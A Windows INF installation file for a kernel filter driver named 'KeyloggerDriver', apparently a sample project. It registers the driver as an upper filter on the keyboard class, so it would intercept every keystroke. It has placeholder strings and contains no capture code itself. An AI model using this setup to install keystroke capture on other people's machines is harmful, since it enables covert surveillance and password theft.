;
; KeyloggerDriver.inf
;

[Version]
Signature="$WINDOWS NT$"
ClassGUID={4D36E96B-E325-11CE-BFC1-08002BE10318}
Class=Keyboard
DriverPackageType=ClassFilter
Provider=%MfgName%
CatalogFile=KeyloggerDriver.cat
DriverVer= ; TODO: set DriverVer in stampinf property pages
PnpLockdown=1

[DestinationDirs]
DefaultDestDir   = 12
KeyloggerDriver_CoInstaller_CopyFiles = 11

;
; Driver information
;


[Standard.NTamd64]
%KeyloggerDriver.DeviceDesc% = KeyloggerDriver, *PNP0BAAD

;
; General installation section
;

[DefaultInstall.ntamd64]
; Copy the driver over
CopyFiles=KeyloggerDriver.CopyFiles

;
; File sections
;

[KeyloggerDriver.CopyFiles]
KeyloggerDriver.sys

;
; Service Installation
;

[DefaultInstall.ntamd64.Services]
AddService = KeyloggerDriver,,KeyloggerDriver.Service

[KeyloggerDriver.Service]
DisplayName    = %KeyloggerDriver.SvcDesc%
ServiceType    = 1                  ; SERVICE_KERNEL_DRIVER
StartType      = 3                  ; SERVICE_DEMAND_START
ErrorControl   = 0                  ; SERVICE_ERROR_IGNORE
ServiceBinary  = %12%\KeyloggerDriver.sys
AddReg	= KeyloggerDriver.AddReg

[KeyloggerDriver.AddReg]
; Add the device upper filter
HKLM, System\CurrentControlSet\Control\Class\{4D36E96B-E325-11CE-BFC1-08002BE10318}, UpperFilters, 0x00010000, "KeyloggerDriver", "kbdclass"

;
; Source file information
;


[SourceDisksNames]
1 = %DiskId1%,,,

[SourceDisksFiles]
KeyloggerDriver.sys = 1
;


;
;--- KeyloggerDriver Coinstaller installation ------
;

[KeyloggerDriver.NT.CoInstallers]
AddReg=KeyloggerDriver_CoInstaller_AddReg
CopyFiles=KeyloggerDriver_CoInstaller_CopyFiles

[KeyloggerDriver_CoInstaller_AddReg]
;


[KeyloggerDriver_CoInstaller_CopyFiles]
;


[KeyloggerDriver.NT.Wdf]
KmdfService = KeyloggerDriver, KeyloggerDriver_wdfsect

[KeyloggerDriver_wdfsect]
KmdfLibraryVersion = 1.15


[Strings]

;
; Non-Localizable Strings
;

REG_SZ         = 0x00000000
REG_MULTI_SZ   = 0x00010000
REG_EXPAND_SZ  = 0x00020000
REG_BINARY     = 0x00000001
REG_DWORD      = 0x00010001

;
; Localizable Strings
;

ProviderName = "Provid"
MfgName      = "Manuf"

KeyloggerDriver.DeviceDesc = "KeyloggerSampleDevice"

KeyloggerDriver.SvcDesc = "KeyloggerDriverSvc"

DiskId1 = "DiskId1"